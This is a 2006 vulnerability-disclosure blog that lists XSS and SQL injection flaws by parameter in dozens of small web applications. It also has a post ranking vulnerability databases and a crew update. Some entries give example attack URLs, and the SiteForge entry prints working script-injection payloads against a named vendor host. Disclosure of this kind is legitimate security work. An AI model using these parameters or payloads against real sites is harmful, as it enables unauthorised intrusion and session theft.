Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

NC LinkList XSS vuln.

2006-06-19T20:37:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.php-linkverzeichnis.de/
affected versions:1.2 and prior
###############################################

Vuln. Description:

NC LinkList contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cat" and "view" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Clubpage vuln.

2006-06-19T20:19:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.powerbatt.com/c-page/
affected versions:Clubpage
###############################################

Vuln. Description:

1.
Clubpage contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "news_archive","language","intranetLogin" parameter in "index.php" and input passed to the "sites_id" parameter in "sites.php" and input passed to the "news_id" parameter in "news_more.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2.
Clubpage contains a flaw that allows a remote sql injection attacks.Input passed to the "category" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

note: XSS and sql injection vuln. also you will find in modules like calendar,runers-script and others.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SLAB500 vuln.

2006-06-19T19:51:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.slab500.com/
affected versions:SLAB500 and prior
###############################################

Vuln. Description:

SLAB500 contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page" and "addcomment" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

note:
Input in "page" parameter in "index.php" will give full path disclosure, and maybe a minimal possibilty to inluce files from local resource.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

PHCDownload SQL injection vuln.

2006-06-19T18:46:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.phpcredo.com/
affected versions:
v1.0.0 Final
v1.0.0 Release Candidate 6
and prior
###############################################

Vuln. Description:

PHCDownload contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "category.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

AssoCIateD XSS vuln.

2006-06-19T18:00:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://herve.labas.free.fr/acid/en/
affected versions:v1.2.0 and prior
###############################################

Vuln. Description:

AssoCIateD contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "menu" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/index.php?p=gal&menu=1[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Arctic XSS

2006-06-19T17:21:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:www.olate.co.uk/products/arctic/
affected versions:1.0.2 and prior
###############################################

Vuln. Description:

Input passed to the search results page and the "/index.php?cmd=search" Query field form isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of a vulnerable site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Open-Realty SQL injection vuln.

2006-06-19T16:51:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.open-realty.org/
affected versions:2.3.1
###############################################

Vuln. Description:

Open-Realty contains a flaw that allows a remote sql injection attacks.Input passed to the "sorttype" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Free Realty vuln.

2006-06-19T16:38:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://freerealty.rwcinc.net/
affected versions:2.9-0.7,2.9-0.6 and prior
###############################################

Vuln. Description:

Free Realty contains a flaw that allows a remote sql injection attacks.Input passed to the "sort" parameter in "propview.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Note about prior versions:
I tested that bug also on Demo site wich are 2.9-0.6, so in same variable was possible XSS ...
And in some earlier 2.9 versions , with an error attacker will get installisations full path and other info.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

BtitTracker SQL injection vuln.

2006-06-19T15:39:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.btiteam.org/
affected versions:v.1.3.2 and prior
###############################################

Vuln. Description:

BtitTracker contains a flaw that allows a remote sql injection attacks.Input passed to the "by" and "order" parameter in "torrents.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

phpMyDirectory XSS vuln.

2006-06-19T15:09:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.phpmydirectory.com/
affected versions:v.10.4.5 and prior
###############################################

Vuln. Description:

phpMyDirectory contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "PIC" parameter in "offers-pix.php" and input passed to the "from" parameter in "cp/index.php" and input passed to the "action" parameter in "cp/admin_index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Sharky e-shop XSS

2006-06-18T16:12:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:http://www.lombar.net/shop/main.asp
affected versions:3.05 and prior
###############################################

Vuln. Description:

Sharky e-shop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "maingroup","secondgroup" parameter in "search_prod_list.asp" and input passed to the "maingroup" parameter in "meny2.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

The Edge eCommerce Shop XSS

2006-06-18T15:48:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:https://www.theedgeshop.com/index.html
affected versions:last
###############################################

Vuln. Description:

The Edge eCommerce Shop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cart_id" parameter in "productDetail.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Tradingeye Shop R4 XSS

2006-06-18T15:18:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:http://www.dpivision.com/
affected versions:R4 and prior
###############################################

Vuln. Description:

Tradingeye Shop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "image" parameter in "details.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

tplShop v 2.0 vuln.

2006-06-18T14:49:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:http://www.tpl-design.com/tplshop/
affected versions:V 2.0 and prior
###############################################

Vuln. Description:

tplShop contains a flaw that allows a remote sql injection attacks.Input passed to the "first_row" parameter in "category.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

xarancms V2.0 vuln.

2006-06-18T14:12:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:www.xaran.de/html/xaran_xarancmsV2.0.php
affected versions:V2.0 and prior
###############################################

Vuln. Description:

xarancms contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "xarancms_haupt.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SiteForge Collaborative Development Platform XSS vuln.

2006-06-15T16:07:00.001+02:00

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.sitelliteforge.com/
affected versions:1.0.4 and prior
###############################################

Vuln. Description:

SiteForge Collaborative Development Platform contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "_status","_extra1","_extra2","_extra3" paramters isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:

http://www.sitelliteforge.com/index/siteforge-bugs-action
/proj.siteforge?proj=siteforge&_status=%3Cscript%3Ealer
t('r0t')%3C/script%3E

http://www.sitelliteforge.com/index/siteforge-bugs-action
/proj.siteforge?proj=siteforge&_extra1=%3Cscript%3Ealert(
'r0t')%3C/script%3E

http://www.sitelliteforge.com/index/siteforge-bugs-action/
proj.siteforge?proj=siteforge&_extra1=&_extra3=%3Cscript%3
Ealert('r0t')%3C/script%3E

http://www.sitelliteforge.com/index/siteforge-bugs-action/
proj.siteforge?proj=siteforge&_extra1=&_extra3=&_extra2=%3
Cscript%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Virtual War multiple SQL inj. vuln.

2006-06-15T14:47:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.vwar.de/
affected versions:v1.5.0 R14 and prior
###############################################

Vuln. Description:

Virtual War contains a flaw that allows a remote sql injection attacks.Input passed to the "s","showgame","sortorder","sortby" parameters in "war.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

openCI SQL inj.

2006-06-15T14:31:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.openci.info/
affected versions: v.1.0 BETA 0.20.1 and prior
###############################################

Vuln. Description:

openCI contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Upgrade to v.1.0 BETA 0.30.0
###############################################
More information @ unsecured-systems.com/forum/

SSPwiz XSS vuln.

2006-06-15T13:50:00.001+02:00

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.sspwiz.com/
affected versions:SSPwiz Plus 1.0.7 and prior
###############################################

Vuln. Description:

SSPwiz contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "message" parameter in "index.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

iPostMX 2005 vuln.

2006-06-15T13:50:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.ipostmx.com/
affected versions:2.0 and prior
###############################################

Vuln. Description:

iPostMX 2005 contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "RETURNURL" parameter in "userlogin.cfm" and "account.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

aXentForum II XSS vuln.

2006-06-15T13:49:00.001+02:00

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.axent.us/axentforum.cfm
affected versions:aXentForum II and prior
###############################################

Vuln. Description:

aXentForum II contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "startrow" parameter in "viewposts.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

aXentGuestbook I.I XSS vuln.

2006-06-15T13:49:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.axent.us/axentguestbook.cfm
affected versions:aXentGuestbook I.I and prior
###############################################

Vuln. Description:

aXentGuestbook contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "startrow" parameter in "guestbook.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

LivingDot Photos XSS vuln.

2006-06-15T13:48:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://photoblog.livingdot.com/
affected versions:latest and prior
###############################################

Vuln. Description:

LivingDot Photos contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page" parameter in "comment.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

EvGenius Counter XSS vuln.

2006-06-13T14:40:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 13 june 2006
vendor:http://counter.evgenius.net/
affected versions:3.4 and prior
###############################################

Vuln. Description:

EvGenius Counter contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page" parameter in "monthly.php" and "daily.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

DwZone Shopping Cart XSS vuln.

2006-06-10T01:16:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 10 june 2006
vendor:http://www.dwzone.it/Extension/ShoppingCart/default.asp
affected versions:1.1.9 and prior
###############################################

Vuln. Description:

DwZone Shopping Cart contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "ToCategory" and "FromCategory" parameter in "ProductDetailsForm.asp" and input passed to the "UserName" and "Password" parameter in "LogIn/VerifyUserLog.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Xtreme ASP Photo Gallery XSS vuln.

2006-06-10T01:01:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 10 june 2006
vendor:http://pensacolawebdesigns.com/xtremeasp/default.asp
affected versions:1.05 and prior
###############################################

Vuln. Description:

Xtreme ASP Photo Gallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "catname" and "total" parameter in "displaypic.asp" and input passed to the "catname" parameter in "displaythumbs.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Uphotogallery XSS vuln.

2006-06-10T00:44:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 10 june 2006
vendor:www.uapplication.com/uphotogallery/index.asp
affected versions:1.1 and prior
###############################################

Vuln. Description:

Uphotogallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "s" and "Block" parameter in "thumbnails.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ePhotos vuln.

2006-06-09T23:08:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://enthrallweb.com/detail.asp?ProductID=13
affected versions:2.2 and prior
###############################################

Vuln. Description:

ePhotos contains a flaw that allows a remote sql injection attacks.Input passed to the "CAT_ID" parameter in "subphotos.asp",subLevel2.asp and Input passed to the "AL_ID" parameter in "photo.asp" and Input passed to the "SUB_ID" parameter in "subLevel2.asp" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

i-Gallery XSS vuln.

2006-06-09T22:54:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.b-cp.com/igallery/
affected versions:i-Gallery 4.1 PLUS and prior
###############################################

Vuln. Description:

i-Gallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "n" and "d" parameter in "login.asp" and input passed to the "d" parameter in "igallery.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

bugtraqs @ all

2006-06-09T21:34:00.000+02:00

Hi guys , as in last 6mothes i had reported about some bugs in webaplications, i think that i can tell something about bugtraqs at all.
Some critic of course..

Lets start with secunia.com
Security research company wich is orginally located in Denmark , those guys do alot of job , they do alot in they personal research..they try to verifyall reported vulns, ok sometimes they verification isnt so sucefull as some attacker exploitation of bug, but dont forget that they try to verify all , so thats point bring them to best form all.

As next one i wanna view osvdb.org
Open source vuln. database - thats says something. Great guys they verify all stuff , thats why they come out later than others.
They was my favorites , but in my eyes thy lose favorite place , when they started to use words "Exploit is Rumored" by examples.
In that point if i give example like http://victim/vuln_app/index.php?cat=[XSS]
Thats one isnt a exploit , did i any time published as exploit?
Its example for those who like or must to verify.
So, thats why it "was" my favorite.

So one of most popular for years is securityfocus.com

They are good enough, i never send them one of my reports.. oh..yes once it was as bugtraq for some site apliction , yahoo or other one.
I was laughing , when i saw credits like discovered by "rakstija r0t3d3vil" ... "rakstija"- is latvian word - wrote .
In start of my repport is always wroten wich guy had discovered that, but thats only mean that guys ned better glases as i have.
Why i didnt report to them?
Simple answer - where to report?
If i cant find with 2 clicks i dont have any interess more to report them.

Next one will be frsirt.com

Nice guys , but they dont verify by them selfs , but wait for secunia guys.
I think thats tell everything.

next one is security.nnov.ru

Nice russian guys, they are more buglist as bugtraq , cauz they dont verify anything .
But good point of them , they are fastest updated "bugtraq" on earth.

and nvd.nist.gov

National vulnerability database, thats says nothin..but domain wich ends with ".gov" say alone something. They risk rate isnt better as by SANS.I dont think that they have alot of reports from guys who discover vulns. , but they are good with collecting them even they are from .gov

and ofcourse xforce.iss.net

I will say its black horse in that chalange.
I never send them report of my work , but they are always know everything.
Maybe they are located as outhsider in by da best ones, but they do good job.

yes and milw0rm.com

str0ke do a good job at all, site is specific cauz mostly is based on exploits and reports are mostly only with exploits, thats not bad at all.

yes and the popular russian source securitylab.ru

They dont verify and remove links to orinal advisory , thats point why i dont like to report to them .. But thats not only them , mostly all russian security resources remove advisory authors and orginaly sources... but in thats i n best way , sometimes they like to give credits to them selfs.. So the worth security or bugtraq scene in world is russian.
Other one russian wich i know is hackzona.ru, they only translate random advisories from secunia and thats all , and there isnt point like "when" or "who"... who cares?
other one is xakep.ru - they have own sucessful jurnal and other things for n00bs.
most of butraq'ed things they published as own.

secwatch.org ....

They collect infos from bigest bugtraqs and have they own bugtraq list wich isnt also verified.

netsecurity.com

copy/paste - thats say evrything.

hackerscenter.com

Not a bugtraq, but portal wich have bugtraq , of course they dont verify , but its more better than russian of point cauz they dont forget about that guys wich discovered that stuff wich they published.

So i think i had wrote about most popular bugtraqs , if i missed some , than sorry ...

ClickGallery vuln.

2006-06-09T20:42:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:ClickTech
affected versions:5.0 and prior
###############################################

ClickGallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "gallery_id" parameter in "gallery.asp" and input passed to the "parentcurrentpage" parameter in "view_gallery.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

fipsCMS <=v4.5 XSS vuln.

2006-06-09T17:38:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:fipsASP
affected versions:v4.5 and prior
###############################################

Vuln. Description:

fipsCMS contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to multiple parameters "w","phcat","dayid","calw" in "index.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

fipsGallery vuln.

2006-06-09T17:19:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:fipsASP
affected versions:v1.5 and prior
###############################################

Vuln. Description:

fipsGallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "path" parameter in "zoom.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Clickcart 6.0 XSS

2006-06-09T16:49:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:ClickTech
affected versions:6.0 and prior
###############################################

Vuln. Description:

Clickcart contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cat" parameter in "default.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

WS-Album XSS vuln.

2006-06-09T16:25:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:PlaneteAfrique
affected versions:1.1 and prior
###############################################

Vuln. Description:

WS-Album contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "image" and "PublisedDate" parameter in "FullPhoto.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

EZGallery <= v1.5 XSS vuln.

2006-06-09T16:09:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:www.htmljunction.net/ezgallery/
affected versions:v1.5 and prior
###############################################

Vuln. Description:

EZGallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the multiple parameters (pUserID,aid,aname,uid,m) in "common/galleries.asp" and Input passed to the multiple parameters (aid,aname,uid,m,gp,g) in "common/pupload.asp" and Input passed to the "msg","fn","gp" parameters in "common/upload.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

My Photo Scrapbook vuln.

2006-06-09T15:28:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:
www.esoftwaresite.com/aspscripts/scrapbook/marketing/main.htm
affected versions: 1.0 and prior
###############################################

Vuln. Description:

1.
My Photo Scrapbook contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "key_m" parameter in "display.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2.
Input passed to the "key" parameter in "Displayview.asp" and "Details_Photo_bv.asp" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ASP ListPics <=4.3 XSS vuln.

2006-06-09T14:42:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.iisworks.com/listpics/
affected versions: 4.3 and prior
###############################################

Vuln. Description:

ASP ListPics contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "Info" parameter in "listpics.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:

/listpics.asp?a=rate&ID=1&Info=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

KAPhotoservice <=7.5 vuln.

2006-06-09T14:29:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.kaphotoservice.com/
affected versions: 7.5 and prior
###############################################

Vuln. Description:

1. Script Insertion attack vuln.

KAPhotoservice contains a flaw that allows a remote script insertion attacks.Input supplied to the "New Category" parameter in "edtalbum.asp" isn't properly sanitised before being used. This can be exploited to insert arbitrary script code, which will be executed in a user's browser session in context of an affected site when malicious data is viewed.

2. Cross-Site Scripting attack vuln.

KAPhotoservice contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cat","albumid" parameter in "album.asp" and input passed to the "apage" parameter in "edtalbum.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:

/album.asp?cat=[XSS]&albumid=1
/albums.asp?cat=&albumid=[XSS]
/edtalbum.asp?cat=&albumid=1&apage=[XSS]

note for developer:
my checking results you become via report module at your software,but its only those where is possible SQL injection.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

VanillaSoft Helpdesk XSS vuln.

2006-06-09T13:15:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.vanillasoft.ch/en/
affected versions:Version 2005 and prior
###############################################

Vuln. Description:

VanillaSoft Helpdesk contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "username" parameter in "default.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

OfficeFlow <=2.6 vuln.

2006-06-09T12:58:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.asptools.biz/officeflow.asp
affected versions:2.6 and prior
###############################################

Vuln. Description:

1. Cross-Site Scripting attack vuln.

OfficeFlow contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "sqlType" parameter in "default.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2. SQL injection attack vuln.

OfficeFlow contains a flaw that allows a remote sql injection attacks.Input passed to the "Project" parameter in "files.asp" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

about general

2006-06-07T16:17:00.000+02:00

I decided that blog isnt best place to continue publishing proxies&socks , cauz its take too much place in your view.
Proxies&socks start yesterday are published on our board .
I will try to contribute daily ,but how long i dont know .

OK.
Other point that i second time heard that i am in some other places one was Security Castle and other one some turkish hackers board .
I dont know who are those persons , but thats not me .. me you can meet only here or on our board .

About Crew ,
cembo will make SQL&XSS tool, that will help lazy guys to discover vulns.
And PMB new realese also will come soon .
As i already told FrozenEye, i will write a simple tut how to discover SQL/XSS vulns on webaplications and other nianses in that case. My tut will not open new america its already said/wroten by many people, it will be just from other view or my view.
We are working also for other stuff , when we come closer to complete results ...than you will know more.
Hm... i said almost all what i wanted to say, just... i dont like situation wich we have on board ... its about mods. I already now discuz with some people about that.. have some candidates ,but im not sure and they arent sure that we can work together , so its actual that we need mods, so if you think you are right person or you wanna be that person , go to our board and speak with guys or with me.

OBM Multiple SQL inj. and XSS vuln.

2006-06-06T15:51:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 6 june 2006
vendor:http://obm.aliacom.fr/
affected versions:
tested on 1.0.3pl1 version.
other versions also can be affected.
###############################################

Vuln. Description:

1. Multiple SQL injection vuln.

OBM contains a flaw that allows a remote sql injection attacks.Input passed to the "new_order" and "order_dir" parameter in
"group/group_index.php","user/user_index.php",
"list/list_index.php","company/company_index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.Multiple Cross-Site Scripting attack vuln.

OBM contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "tf_lang","tf_name","tf_user","tf_lastname",
"tf_contact","tf_datebefore","tf_dateafter" parameter in certain files isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Some examples:

http://obm-host/publication/publication_index.php?
tf_title=&sel_type=_ALL_&tf_year=&tf_lang=[XSS]

http://obm-host/group/group_index.php?action=sear
ch&tf_name=[XSS]

http://obm-host/group/group_index.php?action=sear
ch&tf_name=&tf_user=[XSS]

